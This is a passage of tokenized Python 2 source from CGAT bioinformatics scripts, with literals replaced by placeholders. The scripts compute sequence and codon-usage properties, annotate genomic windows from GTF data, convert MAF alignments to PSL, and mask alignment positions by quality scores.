<NUM_LIT:1> , <EOL> sections = [ ] , <EOL> regex_identifier = "<STR_LIT>" , <EOL> seqtype = "<STR_LIT>" , <EOL> gap_chars = '<STR_LIT>' , <EOL> split_id = False , <EOL> add_total = False , <EOL> ) <EOL> ( options , args ) = E . Start ( parser , argv = argv ) <EOL> rx = re . compile ( options . 
regex_identifier ) <EOL> reference_codons = [ ] <EOL> if options . filename_weights : <EOL> options . filename_weights = options . filename_weights . split ( "<STR_LIT:U+002C>" ) <EOL> for filename in options . filename_weights : <EOL> if filename == "<STR_LIT>" : <EOL> reference_codons . append ( Genomics . GetUniformCodonUsage ( ) ) <EOL> else : <EOL> reference_codons . append ( <EOL> IOTools . ReadMap ( IOTools . openFile ( filename , "<STR_LIT:r>" ) , <EOL> has_header = True , <EOL> map_functions = ( str , float ) ) ) <EOL> options . stdlog . write ( <EOL> "<STR_LIT>" ) <EOL> for x in range ( <NUM_LIT:0> , len ( reference_codons ) ) : <EOL> for y in range ( <NUM_LIT:0> , len ( reference_codons ) ) : <EOL> if x == y : <EOL> continue <EOL> a = reference_codons [ x ] <EOL> b = reference_codons [ y ] <EOL> d = <NUM_LIT:0> <EOL> for codon , p in a . items ( ) : <EOL> if Genomics . IsStopCodon ( codon ) : <EOL> continue <EOL> d += b [ codon ] * math . log ( b [ codon ] / p ) <EOL> options . stdlog . write ( "<STR_LIT>" % <EOL> ( options . filename_weights [ x ] , <EOL> options . filename_weights [ y ] , <EOL> d ) ) <EOL> iterator = FastaIterator . FastaIterator ( options . stdin ) <EOL> def getCounter ( section ) : <EOL> if options . seqtype == "<STR_LIT>" : <EOL> if section == "<STR_LIT>" : <EOL> s = SequenceProperties . SequencePropertiesLength ( ) <EOL> elif section == "<STR_LIT>" : <EOL> s = SequenceProperties . SequencePropertiesSequence ( ) <EOL> elif section == "<STR_LIT>" : <EOL> s = SequenceProperties . SequencePropertiesHid ( ) <EOL> elif section == "<STR_LIT>" : <EOL> s = SequenceProperties . SequencePropertiesNA ( ) <EOL> elif section == "<STR_LIT>" : <EOL> s = SequenceProperties . SequencePropertiesGaps ( <EOL> options . gap_chars ) <EOL> elif section == "<STR_LIT>" : <EOL> s = SequenceProperties . SequencePropertiesCpg ( ) <EOL> elif section == "<STR_LIT>" : <EOL> s = SequenceProperties . 
SequencePropertiesDN ( ) <EOL> elif section == "<STR_LIT>" : <EOL> s = SequenceProperties . SequencePropertiesAA ( ) <EOL> elif section == "<STR_LIT>" : <EOL> s = SequenceProperties . SequencePropertiesDegeneracy ( ) <EOL> elif section == "<STR_LIT>" : <EOL> s = SequenceProperties . SequencePropertiesBias ( reference_codons ) <EOL> elif section == "<STR_LIT>" : <EOL> s = SequenceProperties . SequencePropertiesCodons ( ) <EOL> elif section == "<STR_LIT>" : <EOL> s = SequenceProperties . SequencePropertiesCodonUsage ( ) <EOL> elif section == "<STR_LIT>" : <EOL> s = SequenceProperties . SequencePropertiesCodonTranslator ( ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % section ) <EOL> elif options . seqtype == "<STR_LIT>" : <EOL> if section == "<STR_LIT>" : <EOL> s = SequenceProperties . SequencePropertiesLength ( ) <EOL> elif section == "<STR_LIT>" : <EOL> s = SequenceProperties . SequencePropertiesSequence ( ) <EOL> elif section == "<STR_LIT>" : <EOL> s = SequenceProperties . SequencePropertiesHid ( ) <EOL> elif section == "<STR_LIT>" : <EOL> s = SequenceProperties . SequencePropertiesAminoAcids ( ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % section ) <EOL> return s <EOL> totals = { } <EOL> for section in options . sections : <EOL> totals [ section ] = getCounter ( section ) <EOL> options . stdout . write ( "<STR_LIT:id>" ) <EOL> for section in options . sections : <EOL> options . stdout . write ( "<STR_LIT:\t>" + "<STR_LIT:\t>" . join ( totals [ section ] . getHeaders ( ) ) ) <EOL> options . stdout . write ( "<STR_LIT:\n>" ) <EOL> options . stdout . flush ( ) <EOL> s = getCounter ( "<STR_LIT>" ) <EOL> s . loadSequence ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> for cur_record in iterator : <EOL> sequence = re . sub ( "<STR_LIT:U+0020>" , "<STR_LIT>" , cur_record . sequence ) . upper ( ) <EOL> if len ( sequence ) == <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" % cur_record . title ) <EOL> id = rx . search ( cur_record . title ) . 
groups ( ) [ <NUM_LIT:0> ] <EOL> if options . split_id is True : <EOL> options . stdout . write ( "<STR_LIT:%s>" % id . split ( ) [ <NUM_LIT:0> ] ) <EOL> else : <EOL> options . stdout . write ( "<STR_LIT:%s>" % id ) <EOL> options . stdout . flush ( ) <EOL> for section in options . sections : <EOL> s = getCounter ( section ) <EOL> s . loadSequence ( sequence , options . seqtype ) <EOL> totals [ section ] . addProperties ( s ) <EOL> options . stdout . write ( "<STR_LIT:\t>" + "<STR_LIT:\t>" . join ( s . getFields ( ) ) ) <EOL> options . stdout . write ( "<STR_LIT:\n>" ) <EOL> if options . add_total : <EOL> options . stdout . write ( "<STR_LIT>" ) <EOL> for section in options . sections : <EOL> options . stdout . write ( "<STR_LIT:\t>" + "<STR_LIT:\t>" . join ( totals [ section ] . getFields ( ) ) ) <EOL> options . stdout . write ( "<STR_LIT:\n>" ) <EOL> E . Stop ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> sys . exit ( main ( sys . argv ) ) </s>
<s> '''<STR_LIT>''' <EOL> import sys <EOL> import re <EOL> import CGAT . Experiment as E <EOL> import CGAT . Genomics as Genomics <EOL> import CGAT . IndexedFasta as IndexedFasta <EOL> import CGAT . IndexedGenome as IndexedGenome <EOL> import CGAT . Intervals as Intervals <EOL> import CGAT . Stats as Stats <EOL> import CGAT . GTF as GTF <EOL> def decorator_counts ( intervals , start , end , contig , fasta ) : <EOL> """<STR_LIT>""" <EOL> d = Stats . DistributionalParameters ( map ( lambda x : x [ <NUM_LIT:1> ] - x [ <NUM_LIT:0> ] , intervals ) ) <EOL> return d [ '<STR_LIT>' ] , str ( d ) <EOL> def decorator_percent_coverage ( intervals , start , end , contig , fasta ) : <EOL> """<STR_LIT>""" <EOL> d = Stats . DistributionalParameters ( map ( lambda x : x [ <NUM_LIT:1> ] - x [ <NUM_LIT:0> ] , intervals ) ) <EOL> return <NUM_LIT> * float ( d [ '<STR_LIT>' ] ) / ( end - start ) , str ( d ) <EOL> def decorator_mean_length ( intervals , start , end , contig , fasta ) : <EOL> """<STR_LIT>""" <EOL> d = Stats . DistributionalParameters ( map ( lambda x : x [ <NUM_LIT:1> ] - x [ <NUM_LIT:0> ] , intervals ) ) <EOL> return d [ '<STR_LIT>' ] , str ( d ) <EOL> def decorator_median_length ( intervals , start , end , contig , fasta ) : <EOL> """<STR_LIT>""" <EOL> d = Stats . DistributionalParameters ( map ( lambda x : x [ <NUM_LIT:1> ] - x [ <NUM_LIT:0> ] , intervals ) ) <EOL> return d [ '<STR_LIT>' ] , str ( d ) <EOL> def decorator_percent_gc ( intervals , start , end , contig , fasta ) : <EOL> """<STR_LIT>""" <EOL> l , ngc = <NUM_LIT:0> , <NUM_LIT:0> <EOL> sequence = fasta . getSequence ( contig , "<STR_LIT:+>" , start , end ) <EOL> for istart , iend in intervals : <EOL> ngc += len ( filter ( lambda x : x in "<STR_LIT>" , <EOL> sequence [ istart - start : iend - start ] ) ) <EOL> l += iend - istart <EOL> return <NUM_LIT> * ngc / l , None <EOL> def decorator_median_score ( values , start , end , contig ) : <EOL> """<STR_LIT>""" <EOL> d = Stats . 
DistributionalParameters ( values ) <EOL> return d [ '<STR_LIT>' ] , str ( d ) <EOL> def decorator_mean_score ( values , start , end , contig ) : <EOL> """<STR_LIT>""" <EOL> d = Stats . DistributionalParameters ( values ) <EOL> return d [ '<STR_LIT>' ] , str ( d ) <EOL> def decorator_stddev_score ( values , start , end , contig ) : <EOL> """<STR_LIT>""" <EOL> d = Stats . DistributionalParameters ( values ) <EOL> return d [ '<STR_LIT>' ] , str ( d ) <EOL> def decorator_min_score ( values , start , end , contig ) : <EOL> """<STR_LIT>""" <EOL> d = Stats . DistributionalParameters ( values ) <EOL> return d [ '<STR_LIT>' ] , str ( d ) <EOL> def decorator_max_score ( values , start , end , contig ) : <EOL> """<STR_LIT>""" <EOL> d = Stats . DistributionalParameters ( values ) <EOL> return d [ '<STR_LIT>' ] , str ( d ) <EOL> def transform_overlap ( start , end , intervals_with_gff ) : <EOL> """<STR_LIT>""" <EOL> y = Intervals . combineIntervals ( <EOL> map ( lambda x : ( x [ <NUM_LIT:0> ] , x [ <NUM_LIT:1> ] ) , intervals_with_gff ) ) <EOL> return Intervals . pruneIntervals ( y , start , end ) <EOL> def transform_complement ( start , end , intervals_with_gff ) : <EOL> y = Intervals . combineIntervals ( <EOL> map ( lambda x : ( x [ <NUM_LIT:0> ] , x [ <NUM_LIT:1> ] ) , intervals_with_gff ) ) <EOL> return Intervals . complementIntervals ( y , start , end ) <EOL> def transform_third_codon ( start , end , intervals_with_gff ) : <EOL> """<STR_LIT>""" <EOL> intervals = [ ] <EOL> for istart , iend , gff in intervals_with_gff : <EOL> if gff . frame == "<STR_LIT:.>" : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> frame = int ( gff . frame ) <EOL> if Genomics . IsNegativeStrand ( gff . 
strand ) : <EOL> coordinate_offset = end <EOL> reverse = True <EOL> istart , iend = end - iend , end - istart <EOL> else : <EOL> istart , iend = istart - start , iend - start <EOL> reverse = False <EOL> coordinate_offset = start <EOL> if istart < <NUM_LIT:0> : <EOL> frame = ( frame + istart ) % <NUM_LIT:3> <EOL> istart = <NUM_LIT:0> <EOL> if frame != <NUM_LIT:0> : <EOL> istart -= ( <NUM_LIT:3> - frame ) <EOL> istart += <NUM_LIT:2> <EOL> iend = min ( iend , end - start ) <EOL> for x in range ( istart , iend , <NUM_LIT:3> ) : <EOL> if reverse : <EOL> c = coordinate_offset - x - <NUM_LIT:1> <EOL> else : <EOL> c = coordinate_offset + x <EOL> intervals . append ( ( c , c + <NUM_LIT:1> ) ) <EOL> return Intervals . combineIntervals ( intervals ) <EOL> def test_transform_third_codon ( ) : <EOL> def test_entry ( frame , strand , xfrom , xto , start , end , ref ) : <EOL> entry = GTF . Entry ( ) <EOL> entry . frame = frame <EOL> entry . strand = strand <EOL> entry . start = xfrom <EOL> entry . end = xto <EOL> intervals = transform_third_codon ( start , end , [ ( xfrom , xto , entry ) ] ) <EOL> if ref != intervals : <EOL> print "<STR_LIT>" , ref != intervals <EOL> test_entry ( <NUM_LIT:0> , "<STR_LIT:+>" , <NUM_LIT:1> , <NUM_LIT:7> , <NUM_LIT:0> , <NUM_LIT:6> , [ ( <NUM_LIT:3> , <NUM_LIT:4> ) ] ) <EOL> test_entry ( <NUM_LIT:0> , "<STR_LIT:->" , <NUM_LIT:1> , <NUM_LIT:7> , <NUM_LIT:0> , <NUM_LIT:6> , [ ( <NUM_LIT:1> , <NUM_LIT:2> ) , ( <NUM_LIT:4> , <NUM_LIT:5> ) ] ) <EOL> test_entry ( <NUM_LIT:1> , "<STR_LIT:+>" , <NUM_LIT:1> , <NUM_LIT:7> , <NUM_LIT:0> , <NUM_LIT:6> , [ ( <NUM_LIT:1> , <NUM_LIT:2> ) , ( <NUM_LIT:4> , <NUM_LIT:5> ) ] ) <EOL> test_entry ( <NUM_LIT:2> , "<STR_LIT:+>" , <NUM_LIT:1> , <NUM_LIT:7> , <NUM_LIT:0> , <NUM_LIT:6> , [ ( <NUM_LIT:2> , <NUM_LIT:3> ) , ( <NUM_LIT:5> , <NUM_LIT:6> ) ] ) <EOL> test_entry ( <NUM_LIT:1> , "<STR_LIT:->" , <NUM_LIT:1> , <NUM_LIT:7> , <NUM_LIT:0> , <NUM_LIT:6> , [ ( <NUM_LIT:3> , <NUM_LIT:4> ) ] ) <EOL> test_entry ( <NUM_LIT:2> , 
"<STR_LIT:->" , <NUM_LIT:1> , <NUM_LIT:7> , <NUM_LIT:0> , <NUM_LIT:6> , [ ( <NUM_LIT:2> , <NUM_LIT:3> ) , ( <NUM_LIT:5> , <NUM_LIT:6> ) ] ) <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> def annotateWindows ( contig , windows , gff_data , fasta , options ) : <EOL> """<STR_LIT>""" <EOL> index = IndexedGenome . IndexedGenome ( ) <EOL> for g in gff_data : <EOL> index . add ( g . contig , g . start , g . end , g ) <EOL> is_gtf = options . is_gtf <EOL> if options . transform == "<STR_LIT:none>" : <EOL> transform = lambda x , y , z : map ( lambda x : ( x [ <NUM_LIT:0> ] , x [ <NUM_LIT:1> ] ) , z ) <EOL> elif options . transform == "<STR_LIT>" : <EOL> transform = transform_overlap <EOL> elif options . transform == "<STR_LIT>" : <EOL> transform = transform_complement <EOL> elif options . transform == "<STR_LIT>" : <EOL> transform = transform_third_codon <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % options . transform ) <EOL> work_on_intervals = True <EOL> if options . decorator == "<STR_LIT>" : <EOL> decorator = decorator_counts <EOL> elif options . decorator == "<STR_LIT>" : <EOL> decorator = decorator_mean_length <EOL> elif options . decorator == "<STR_LIT>" : <EOL> decorator = decorator_median_length <EOL> elif options . decorator == "<STR_LIT>" : <EOL> decorator = decorator_percent_coverage <EOL> elif options . decorator == "<STR_LIT>" : <EOL> decorator = decorator_percent_gc <EOL> elif options . decorator == "<STR_LIT>" : <EOL> decorator = decorator_median_score <EOL> work_on_intervals = False <EOL> elif options . decorator == "<STR_LIT>" : <EOL> decorator = decorator_mean_score <EOL> work_on_intervals = False <EOL> elif options . decorator == "<STR_LIT>" : <EOL> decorator = decorator_stddev_score <EOL> work_on_intervals = False <EOL> elif options . decorator == "<STR_LIT>" : <EOL> decorator = decorator_min_score <EOL> work_on_intervals = False <EOL> elif options . 
decorator == "<STR_LIT>" : <EOL> decorator = decorator_max_score <EOL> work_on_intervals = False <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % options . decorator ) <EOL> for start , end in windows : <EOL> n1 , l1 , n2 , l2 = <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> <EOL> values , intervals_with_gff , genes , transcripts = [ ] , [ ] , set ( ) , set ( ) <EOL> try : <EOL> for istart , iend , value in index . get ( contig , start , end ) : <EOL> n1 += <NUM_LIT:1> <EOL> l1 += iend - istart <EOL> intervals_with_gff . append ( ( istart , iend , value ) ) <EOL> values . append ( value . score ) <EOL> if is_gtf : <EOL> genes . add ( value . gene_id ) <EOL> transcripts . add ( value . transcript_id ) <EOL> except KeyError : <EOL> pass <EOL> if n1 == <NUM_LIT:0> and options . skip_empty : <EOL> continue <EOL> if work_on_intervals : <EOL> if options . loglevel >= <NUM_LIT:3> : <EOL> options . stdlog . write ( "<STR_LIT>" % ( <EOL> start , end , str ( intervals ) ) ) <EOL> intervals = transform ( start , end , intervals_with_gff ) <EOL> for xstart , xend in intervals : <EOL> n2 += <NUM_LIT:1> <EOL> l2 += xend - xstart <EOL> if options . loglevel >= <NUM_LIT:3> : <EOL> options . stdlog . write ( "<STR_LIT>" % ( <EOL> start , end , str ( intervals ) ) ) <EOL> score , extra_info = decorator ( intervals , start , end , contig , fasta ) <EOL> else : <EOL> if len ( values ) > <NUM_LIT:0> : <EOL> values = map ( float , values ) <EOL> score , extra_info = decorator ( values , start , end , contig ) <EOL> else : <EOL> score , extra_info = <NUM_LIT:0> , None <EOL> l2 = <NUM_LIT:0> <EOL> n2 = <NUM_LIT:0> <EOL> if is_gtf : <EOL> ngenes , ntranscripts = len ( genes ) , len ( transcripts ) <EOL> else : <EOL> ngenes , ntranscripts = <NUM_LIT:0> , <NUM_LIT:0> <EOL> if extra_info : <EOL> extra_info = re . sub ( "<STR_LIT:\t>" , "<STR_LIT:;>" , extra_info ) <EOL> options . stdout . write ( "<STR_LIT:\t>" . 
join ( <EOL> map ( str , ( contig , start , end , <EOL> ngenes , ntranscripts , <EOL> n1 , l1 , <EOL> n2 , l2 , <EOL> score , <EOL> extra_info ) ) ) + "<STR_LIT:\n>" ) <EOL> def main ( argv = None ) : <EOL> """<STR_LIT>""" <EOL> if argv is None : <EOL> argv = sys . argv <EOL> parser = E . OptionParser ( version = "<STR_LIT>" , <EOL> usage = globals ( ) [ "<STR_LIT>" ] ) <EOL> parser . add_option ( <EOL> "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( <EOL> "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( <EOL> "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( <EOL> "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT>" , action = "<STR_LIT>" , <EOL> choices = ( "<STR_LIT>" , ) , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( <EOL> "<STR_LIT:-c>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT>" , <EOL> choices = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( <EOL> "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( <EOL> "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT>" , <EOL> choices = ( <EOL> "<STR_LIT:none>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> help = "<STR_LIT>" ) <EOL> parser . 
set_defaults ( <EOL> genome_file = None , <EOL> filename_windows = None , <EOL> filename_data = None , <EOL> features = [ ] , <EOL> skip_empty = False , <EOL> decorator = "<STR_LIT>" , <EOL> transform = "<STR_LIT:none>" , <EOL> is_gtf = False , <EOL> ) <EOL> ( options , args ) = E . Start ( parser ) <EOL> if not options . filename_windows : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if options . loglevel >= <NUM_LIT:1> : <EOL> options . stdlog . write ( "<STR_LIT>" ) <EOL> options . stdlog . flush ( ) <EOL> windows = GTF . readAsIntervals ( <EOL> GTF . iterator ( IOTools . openFile ( options . filename_windows , "<STR_LIT:r>" ) ) ) <EOL> if options . loglevel >= <NUM_LIT:1> : <EOL> options . stdlog . write ( "<STR_LIT>" ) <EOL> options . stdlog . flush ( ) <EOL> if options . filename_data : <EOL> if options . loglevel >= <NUM_LIT:1> : <EOL> options . stdlog . write ( "<STR_LIT>" ) <EOL> options . stdlog . flush ( ) <EOL> if options . is_gtf : <EOL> gff_data = GTF . readFromFile ( <EOL> IOTools . openFile ( options . filename_data , "<STR_LIT:r>" ) ) <EOL> else : <EOL> gff_data = GTF . readFromFile ( <EOL> IOTOols . openFile ( options . filename_data , "<STR_LIT:r>" ) ) <EOL> if options . loglevel >= <NUM_LIT:1> : <EOL> options . stdlog . write ( "<STR_LIT>" ) <EOL> options . stdlog . flush ( ) <EOL> data_ranges = GTF . SortPerContig ( gff_data ) <EOL> else : <EOL> gff_data = None <EOL> data_ranges = None <EOL> options . transform = "<STR_LIT>" <EOL> map_contig2size = { } <EOL> if options . genome_file : <EOL> fasta = IndexedFasta . IndexedFasta ( options . genome_file ) <EOL> map_contig2size = fasta . getContigSizes ( ) <EOL> else : <EOL> for contig , values in windows . items ( ) : <EOL> map_contig2size [ contig ] = max ( lambda x : x [ <NUM_LIT:1> ] , values ) <EOL> fasta = None <EOL> contigs = map_contig2size . keys ( ) <EOL> contigs . 
sort ( ) <EOL> noutput_contigs , ncontigs_skipped_windows , ncontigs_skipped_data = <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> <EOL> options . stdout . write ( "<STR_LIT:\t>" . join ( <EOL> map ( str , ( "<STR_LIT>" , "<STR_LIT:start>" , "<STR_LIT:end>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) ) ) + "<STR_LIT:\n>" ) <EOL> for contig in contigs : <EOL> skip = False <EOL> if contig not in windows : <EOL> ncontigs_skipped_windows += <NUM_LIT:1> <EOL> skip = True <EOL> if data_ranges and contig not in data_ranges : <EOL> ncontigs_skipped_data += <NUM_LIT:1> <EOL> skip = True <EOL> if skip : <EOL> continue <EOL> noutput_contigs += <NUM_LIT:1> <EOL> if data_ranges : <EOL> annotateWindows ( contig , <EOL> windows [ contig ] , <EOL> gff_data [ <EOL> data_ranges [ contig ] [ <NUM_LIT:0> ] : data_ranges [ contig ] [ <NUM_LIT:1> ] ] , <EOL> fasta , <EOL> options ) <EOL> else : <EOL> annotateWindows ( contig , <EOL> windows [ contig ] , <EOL> [ ] , <EOL> fasta , <EOL> options ) <EOL> E . info ( "<STR_LIT>" % <EOL> ( len ( windows ) , noutput_contigs , len ( contigs ) , ncontigs_skipped_windows , ncontigs_skipped_data ) ) <EOL> E . Stop ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> sys . exit ( main ( sys . argv ) ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import CGAT . Experiment as E <EOL> from bx . align import maf <EOL> from bx . align . tools import get_components_for_species <EOL> import CGAT . Blat as Blat <EOL> def threaditer ( reader , species ) : <EOL> '''<STR_LIT>''' <EOL> for m in reader : <EOL> components = get_components_for_species ( m , species ) <EOL> if components is not None : <EOL> yield components <EOL> def main ( argv = None ) : <EOL> """<STR_LIT>""" <EOL> if not argv : <EOL> argv = sys . argv <EOL> parser = E . OptionParser ( version = "<STR_LIT>" , <EOL> usage = globals ( ) [ "<STR_LIT>" ] ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT:target>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . set_defaults ( <EOL> query = None , <EOL> target = None , <EOL> ) <EOL> ( options , args ) = E . Start ( parser , argv = argv ) <EOL> if options . query is None or options . target is None : <EOL> if len ( args ) != <NUM_LIT:2> : <EOL> raise ValueError ( <EOL> "<STR_LIT>" ) <EOL> options . query , options . target = args <EOL> ninput , nskipped , noutput = <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> <EOL> reader = maf . Reader ( options . stdin ) <EOL> psl = Blat . Match ( ) <EOL> for cc in threaditer ( reader , ( options . query , options . target ) ) : <EOL> ninput += <NUM_LIT:1> <EOL> query , target = cc <EOL> try : <EOL> data = query . src . split ( "<STR_LIT:.>" ) <EOL> qs , qcontig = data [ <NUM_LIT:0> ] , "<STR_LIT:.>" . join ( data [ <NUM_LIT:1> : ] ) <EOL> except ValueError , msg : <EOL> raise ValueError ( <EOL> "<STR_LIT>" % ( query . src , msg ) ) <EOL> try : <EOL> data = target . src . split ( "<STR_LIT:.>" ) <EOL> ts , tcontig = data [ <NUM_LIT:0> ] , "<STR_LIT:.>" . 
join ( data [ <NUM_LIT:1> : ] ) <EOL> except ValueError , msg : <EOL> raise ValueError ( <EOL> "<STR_LIT>" % ( target . src , msg ) ) <EOL> assert qs == options . query <EOL> assert ts == options . target <EOL> psl . mQueryId = qcontig <EOL> psl . mSbjctId = tcontig <EOL> psl . fromPair ( query . start , query . src_size , query . strand , query . text . upper ( ) , <EOL> target . start , target . src_size , target . strand , target . text . upper ( ) ) <EOL> E . debug ( "<STR_LIT>" % <EOL> ( qs , qcontig , query . start , query . src_size , query . strand , query . text ) ) <EOL> E . debug ( "<STR_LIT>" % <EOL> ( ts , tcontig , target . start , target . src_size , target . strand , target . text ) ) <EOL> options . stdout . write ( "<STR_LIT>" % str ( psl ) ) <EOL> noutput += <NUM_LIT:1> <EOL> E . info ( "<STR_LIT>" % ( ninput , noutput , nskipped ) ) <EOL> E . Stop ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> sys . exit ( main ( sys . argv ) ) </s>
<s> '''<STR_LIT>''' <EOL> import sys <EOL> import random <EOL> import alignlib_lite <EOL> import CGAT . Experiment as E <EOL> import CGAT . Blat as Blat <EOL> import CGAT . Iterators as Iterators <EOL> import CGAT . IndexedFasta as IndexedFasta <EOL> def fillAlignment ( map_alignment , alignment ) : <EOL> i = <NUM_LIT:0> <EOL> for x , c in enumerate ( alignment ) : <EOL> if c != "<STR_LIT:->" : <EOL> map_alignment . addPair ( i , x ) <EOL> i += <NUM_LIT:1> <EOL> def main ( argv = None ) : <EOL> parser = E . OptionParser ( <EOL> version = "<STR_LIT>" , usage = globals ( ) [ "<STR_LIT>" ] ) <EOL> parser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . set_defaults ( <EOL> quality_threshold = <NUM_LIT> , <EOL> quality_file = "<STR_LIT>" , <EOL> filename_map = None , <EOL> frame = <NUM_LIT:3> , <EOL> ) <EOL> ( options , args ) = E . Start ( parser ) <EOL> infile = open ( options . filename_map ) <EOL> map_genes2genome = { } <EOL> for match in Blat . iterator ( infile ) : <EOL> assert match . mQueryId not in map_genes2genome , "<STR_LIT>" % match . mQueryId <EOL> map_genes2genome [ match . mQueryId ] = match <EOL> infile . close ( ) <EOL> quality = IndexedFasta . IndexedFasta ( options . quality_file ) <EOL> quality . setTranslator ( IndexedFasta . TranslatorBytes ( ) ) <EOL> ninput , noutput , nmissed = <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> <EOL> options . stdout . write ( "<STR_LIT>" ) <EOL> for line in options . stdin : <EOL> if line . 
startswith ( "<STR_LIT>" ) : <EOL> continue <EOL> ninput += <NUM_LIT:1> <EOL> cluster_id , gene_id , alignment = line [ : - <NUM_LIT:1> ] . split ( "<STR_LIT:\t>" ) <EOL> if gene_id not in map_genes2genome : <EOL> nmissed += <NUM_LIT:1> <EOL> E . warn ( "<STR_LIT>" % gene_id ) <EOL> continue <EOL> match = map_genes2genome [ gene_id ] <EOL> map_gene2genome = match . getMapQuery2Target ( ) <EOL> is_negative = match . strand == "<STR_LIT:->" <EOL> if is_negative : <EOL> alignment = alignment [ : : - <NUM_LIT:1> ] <EOL> map_gene2mali = alignlib_lite . py_makeAlignmentVector ( ) <EOL> fillAlignment ( map_gene2mali , alignment ) <EOL> try : <EOL> quality_scores = quality . getSequence ( <EOL> match . mSbjctId , "<STR_LIT:+>" , match . mSbjctFrom , match . mSbjctTo ) <EOL> except ValueError , msg : <EOL> nmissed += <NUM_LIT:1> <EOL> E . warn ( "<STR_LIT>" % <EOL> ( match . mSbjctId , match . mSbjctFrom , match . mSbjctTo , msg ) ) <EOL> continue <EOL> map_mali2genome = alignlib_lite . py_makeAlignmentVector ( ) <EOL> alignlib_lite . py_combineAlignment ( <EOL> map_mali2genome , map_gene2mali , map_gene2genome , alignlib_lite . py_RR ) <EOL> if options . random : <EOL> positions = [ ] <EOL> for fp , c in enumerate ( alignment ) : <EOL> if c == "<STR_LIT:->" : <EOL> continue <EOL> y = map_mali2genome . mapRowToCol ( fp ) - match . mSbjctFrom <EOL> if y < <NUM_LIT:0> : <EOL> continue <EOL> positions . append ( y ) <EOL> scores = [ quality_scores [ x ] for x in positions ] <EOL> random . shuffle ( scores ) <EOL> for p , q in zip ( positions , scores ) : <EOL> quality_scores [ p ] = q <EOL> to_mask = [ ] <EOL> rp = len ( alignment ) <EOL> for fp , c in enumerate ( alignment ) : <EOL> rp -= <NUM_LIT:1> <EOL> if c == "<STR_LIT:->" : <EOL> continue <EOL> y = map_mali2genome . mapRowToCol ( fp ) - match . mSbjctFrom <EOL> if y < <NUM_LIT:0> : <EOL> continue <EOL> if quality_scores [ y ] < options . 
